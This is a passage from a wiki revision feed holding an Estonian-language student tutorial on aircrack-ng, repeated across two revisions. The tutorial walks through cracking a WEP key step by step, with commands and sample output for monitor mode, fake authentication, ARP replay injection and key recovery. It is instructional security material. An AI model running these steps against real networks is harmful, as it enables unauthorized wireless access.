       product: Centrino Advanced-N 6205 [Taylor Peak]&lt;br /&gt;
       vendor: Intel Corporation&lt;br /&gt;
       physical id: 0&lt;br /&gt;
       bus info: pci@0000:02:00.0&lt;br /&gt;
       logical name: wlan0&lt;br /&gt;
       version: 34&lt;br /&gt;
       serial: 6c:88:14:1d:29:c4&lt;br /&gt;
       width: 64 bits&lt;br /&gt;
       clock: 33MHz&lt;br /&gt;
       capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless&lt;br /&gt;
       configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn&lt;br /&gt;
       resources: irq:32 memory:f7d00000-f7d01fff&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;&amp;lt;!-- Warning style viksitud ArchWikist --&amp;gt;div style=&amp;quot;padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;&amp;quot;&amp;gt;&#039;&#039;&#039;Pane tähele! &#039;&#039;&#039;Antud juhend on koostatud kasutades Ubuntu 15.04 (Vivid Vervet) ja Aircrack-ng 1.2 RC2 versioone. &amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Üldkirjeldus=&lt;br /&gt;
&lt;br /&gt;
aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu:&lt;br /&gt;
* airodump-ng - programm pakettide püüdmiseks &lt;br /&gt;
* aireplay-ng - programm pakettide „süstimiseks“ &lt;br /&gt;
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija&lt;br /&gt;
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks &lt;br /&gt;
&lt;br /&gt;
==Süntaks==&lt;br /&gt;
&lt;br /&gt;
aircrack-ng süntaks näeb välja järgmine:&lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng [võti] &amp;lt;püütud fail(id)&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&amp;amp;DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]&lt;br /&gt;
&lt;br /&gt;
=Installeerimine=&lt;br /&gt;
&lt;br /&gt;
Uuendame repositooriumi:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get update&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get install aircrack-ng&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=WEP võtme murdmine=&lt;br /&gt;
&lt;br /&gt;
Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja: &lt;br /&gt;
* Arvuti MAC aadress, mis jooksutab aircrack-ng&#039;d: 00:0F:B5:88:AC:82&lt;br /&gt;
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80&lt;br /&gt;
* ESSID (võrgu nimi): teddy&lt;br /&gt;
* Pääsupunkti kanal: 9&lt;br /&gt;
* Raadiovõrgu liides (ingl. k Wireless interface): ath0&lt;br /&gt;
&lt;br /&gt;
==Eesmärk==&lt;br /&gt;
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
==Lühikesed tegevussammud==&lt;br /&gt;
Lühidalt sammudest, mida tegema asume:&amp;lt;br&amp;gt;&lt;br /&gt;
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode)&amp;lt;br&amp;gt;&lt;br /&gt;
2. Testime „süstimise“ suutlikkust pääsupunktile &amp;lt;br&amp;gt;&lt;br /&gt;
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
4. Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga &amp;lt;br&amp;gt;&lt;br /&gt;
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette&amp;lt;br&amp;gt;&lt;br /&gt;
6. Kasutada aircrack-ng&#039;d salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Näide WEP võtme lahti murdmise protsessist==&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.&lt;br /&gt;
 &lt;br /&gt;
Peata ath0 liidese:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng stop ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;Interface       Chipset         Driver&lt;br /&gt;
&lt;br /&gt;
wifi0           Atheros         madwifi-ng&lt;br /&gt;
ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kontrolli, kas kõik athX liidesed on ikka suletud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Märge:&#039;&#039;&#039; Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval &#039;&#039;&#039;airmon-ng stop athX&#039;&#039;&#039; käsuga sulgeda.&lt;br /&gt;
&lt;br /&gt;
Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng start wifi0 9&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav airmon-ng stop ath0 käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raaiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt; Interface       Chipset         Driver&lt;br /&gt;
 &lt;br /&gt;
 wifi0           Atheros         madwifi-ng&lt;br /&gt;
 ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pane tähele! “ath0” liides on märgitud nüüd kuulamisrežiimi.&lt;br /&gt;
&lt;br /&gt;
Veendumaks, et liides on korrektselt üles seatud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
ath0      IEEE 802.11g  ESSID:&amp;quot;&amp;quot;  Nickname:&amp;quot;&amp;quot;&lt;br /&gt;
       Mode:Monitor  Frequency:2.452 GHz  Access Point: 00:0F:B5:88:AC:82   &lt;br /&gt;
       Bit Rate:0 kb/s   Tx-Power:18 dBm   Sensitivity=0/3  &lt;br /&gt;
       Retry:off   RTS thr:off   Fragment thr:off&lt;br /&gt;
       Encryption key:off&lt;br /&gt;
       Power Management:off&lt;br /&gt;
       Link Quality=0/94  Signal level=-95 dBm  Noise level=-95 dBm&lt;br /&gt;
       Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
       Tx excessive retries:0  Invalid misc:0   Missed beacon:0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Kontrolli:&#039;&#039;&#039; Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng&#039;d jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 2: Testime „süstimise“ suutlikkust pääsupunktile&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.&lt;br /&gt;
 &lt;br /&gt;
Sisesta käsureale:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80  ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&lt;br /&gt;
-9 - “süstimise” test&lt;br /&gt;
-e teddy – raadiovõrgu nimi&lt;br /&gt;
-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress&lt;br /&gt;
ath0 – raadiovõrgu liides&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;09:23:35  Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9&lt;br /&gt;
09:23:35  Trying broadcast probe requests...&lt;br /&gt;
09:23:35  Injection is working!&lt;br /&gt;
09:23:37  Found 1 AP &lt;br /&gt;
&lt;br /&gt;
09:23:37  Trying directed probe requests...&lt;br /&gt;
09:23:37  00:14:6C:7E:40:80 - channel: 9 - &#039;teddy&#039;&lt;br /&gt;
09:23:39  Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73&lt;br /&gt;
09:23:39  30/30: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pane tähele! Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.  &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 3: Avada airodump-ng pakettide püüdmiseks&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta: &lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&lt;br /&gt;
-c 9 – raadiovõrgu kanal&lt;br /&gt;
--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühendud&lt;br /&gt;
-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:&lt;br /&gt;
&amp;lt;pre&amp;gt;CH  9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25 &lt;br /&gt;
                                                                                                              &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80   42 100     5240   178307  338   9  54  WEP  WEP         teddy                           &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 BSSID              STATION            PWR  Lost  Packets  Probes                                             &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80  00:0F:B5:88:AC:82   42     0   183782  &amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 4: Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgitus:&lt;br /&gt;
-1 – võlts autentimine&lt;br /&gt;
0 – kordusühendus(t)e aeg sekundites&lt;br /&gt;
-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Õnnestumise korral on tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;18:18:20  Sending Authentication Request&lt;br /&gt;
18:18:20  Authentication successful&lt;br /&gt;
18:18:20  Sending Association Request&lt;br /&gt;
18:18:20  Association successful :-)&lt;br /&gt;
Ebaõnnestumise korral on tulemus: &lt;br /&gt;
8:28:02  Sending Authentication Request&lt;br /&gt;
18:28:02  Authentication successful&lt;br /&gt;
18:28:02  Sending Association Request&lt;br /&gt;
18:28:02  Association successful :-)&lt;br /&gt;
18:28:02  Got a deauthentication packet!&lt;br /&gt;
18:28:05  Sending Authentication Request&lt;br /&gt;
18:28:05  Authentication successful&lt;br /&gt;
18:28:05  Sending Association Request&lt;br /&gt;
18:28:10  Sending Authentication Request&lt;br /&gt;
18:28:10  Authentication successful&lt;br /&gt;
18:28:10  Sending Association Request&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;Saving ARP requests in replay_arp-0321-191525.cap&lt;br /&gt;
You should also start airodump-ng to capture replies.&lt;br /&gt;
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 6: Ava aircrack-ng salasõna lahti murdmiseks&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken: &lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng -b 00:14:6C:7E:40:80 output*.cap&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&lt;br /&gt;
Selgitus:&lt;br /&gt;
-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub&lt;br /&gt;
output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;                             [00:03:06] Tested 674449 keys (got 96610 IVs)&lt;br /&gt;
&lt;br /&gt;
KB    depth   byte(vote)&lt;br /&gt;
 0    0/  9   12(  15) F9(  15) 47(  12) F7(  12) FE(  12) 1B(   5) 77(   5) A5(   3) F6(   3) 03(   0) &lt;br /&gt;
 1    0/  8   34(  61) E8(  27) E0(  24) 06(  18) 3B(  16) 4E(  15) E1(  15) 2D(  13) 89(  12) E4(  12) &lt;br /&gt;
 2    0/  2   56(  87) A6(  63) 15(  17) 02(  15) 6B(  15) E0(  15) AB(  13) 0E(  10) 17(  10) 27(  10) &lt;br /&gt;
 3    1/  5   78(  43) 1A(  20) 9B(  20) 4B(  17) 4A(  16) 2B(  15) 4D(  15) 58(  15) 6A(  15) 7C(  15) &lt;br /&gt;
&lt;br /&gt;
                      KEY FOUND! [ 12:34:56:78:90 ] &lt;br /&gt;
     Probability: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Kokkuvõte=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Kasutatud kirjandus=&lt;br /&gt;
&amp;lt;references/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Autor=&lt;br /&gt;
&lt;br /&gt;
Kelly Tragel [ISa 21]&amp;lt;br&amp;gt;&lt;br /&gt;
Viimati muudetud: 25.05.2015&lt;br /&gt;
&lt;br /&gt;
=Versioonide ajalugu=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table border=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Kuupäev &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Versioon &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 25.05.2015 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 1.0 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ktragel</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89289</id>
		<title>Aircrack</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89289"/>
		<updated>2015-05-25T19:17:21Z</updated>

		<summary type="html">&lt;p&gt;Ktragel: /* Lühikesed tegevussammud */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Sissejuhatus=&lt;br /&gt;
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit. &lt;br /&gt;
&lt;br /&gt;
=Eeldused=&lt;br /&gt;
&lt;br /&gt;
* Elementaarne käsurea kasutamisoskus&lt;br /&gt;
* Teadmised WiFi, WEP, WPA/WPA2 kohta&lt;br /&gt;
* Võrgus vähemalt 1 aktiivne klient&lt;br /&gt;
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)&lt;br /&gt;
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)&lt;br /&gt;
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])&lt;br /&gt;
&lt;br /&gt;
WiFi adapteri vaatamine:&lt;br /&gt;
&amp;lt;pre&amp;gt;lspci -nn | grep Network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või rohkema informatsiooni saamiseks:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;lshw -class network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemuseks saame midagi sarnast:&lt;br /&gt;
&amp;lt;pre&amp;gt;02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;*-network&lt;br /&gt;
       description: Wireless interface&lt;br /&gt;
       product: Centrino Advanced-N 6205 [Taylor Peak]&lt;br /&gt;
       vendor: Intel Corporation&lt;br /&gt;
       physical id: 0&lt;br /&gt;
       bus info: pci@0000:02:00.0&lt;br /&gt;
       logical name: wlan0&lt;br /&gt;
       version: 34&lt;br /&gt;
       serial: 6c:88:14:1d:29:c4&lt;br /&gt;
       width: 64 bits&lt;br /&gt;
       clock: 33MHz&lt;br /&gt;
       capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless&lt;br /&gt;
       configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn&lt;br /&gt;
       resources: irq:32 memory:f7d00000-f7d01fff&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;&amp;lt;!-- Warning style viksitud ArchWikist --&amp;gt;div style=&amp;quot;padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;&amp;quot;&amp;gt;&#039;&#039;&#039;Pane tähele! &#039;&#039;&#039;Antud juhend on koostatud kasutades Ubuntu 15.04 (Vivid Vervet) ja Aircrack-ng 1.2 RC2 versioone. &amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Üldkirjeldus=&lt;br /&gt;
&lt;br /&gt;
aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu:&lt;br /&gt;
* airodump-ng - programm pakettide püüdmiseks &lt;br /&gt;
* aireplay-ng - programm pakettide „süstimiseks“ &lt;br /&gt;
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija&lt;br /&gt;
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks &lt;br /&gt;
&lt;br /&gt;
==Süntaks==&lt;br /&gt;
&lt;br /&gt;
aircrack-ng süntaks näeb välja järgmine:&lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng [võti] &amp;lt;püütud fail(id)&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&amp;amp;DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]&lt;br /&gt;
&lt;br /&gt;
=Installeerimine=&lt;br /&gt;
&lt;br /&gt;
Uuendame repositooriumi:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get update&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get install aircrack-ng&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=WEP võtme murdmine=&lt;br /&gt;
&lt;br /&gt;
Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja: &lt;br /&gt;
* Arvuti MAC aadress, mis jooksutab aircrack-ng&#039;d: 00:0F:B5:88:AC:82&lt;br /&gt;
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80&lt;br /&gt;
* ESSID (võrgu nimi): teddy&lt;br /&gt;
* Pääsupunkti kanal: 9&lt;br /&gt;
* Raadiovõrgu liides (ingl. k Wireless interface): ath0&lt;br /&gt;
&lt;br /&gt;
==Eesmärk==&lt;br /&gt;
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
==Lühikesed tegevussammud==&lt;br /&gt;
Lühidalt sammudest, mida tegema asume:&amp;lt;br&amp;gt;&lt;br /&gt;
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode)&amp;lt;br&amp;gt;&lt;br /&gt;
2. Testime „süstimise“ suutlikkust pääsupunktile &amp;lt;br&amp;gt;&lt;br /&gt;
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
4. Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga &amp;lt;br&amp;gt;&lt;br /&gt;
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette&amp;lt;br&amp;gt;&lt;br /&gt;
6. Kasutada aircrack-ng&#039;d salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Näide WEP võtme lahti murdmise protsessist==&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.&lt;br /&gt;
 &lt;br /&gt;
Peata ath0 liidese:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng stop ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;Interface       Chipset         Driver&lt;br /&gt;
&lt;br /&gt;
wifi0           Atheros         madwifi-ng&lt;br /&gt;
ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kontrolli, kas kõik athX liidesed on ikka suletud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval &#039;&#039;&#039;airmon-ng stop athX&#039;&#039;&#039; käsuga sulgeda.&lt;br /&gt;
&lt;br /&gt;
Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng start wifi0 9&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pane tähele! Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav airmon-ng stop ath0 käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raaiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt; Interface       Chipset         Driver&lt;br /&gt;
 &lt;br /&gt;
 wifi0           Atheros         madwifi-ng&lt;br /&gt;
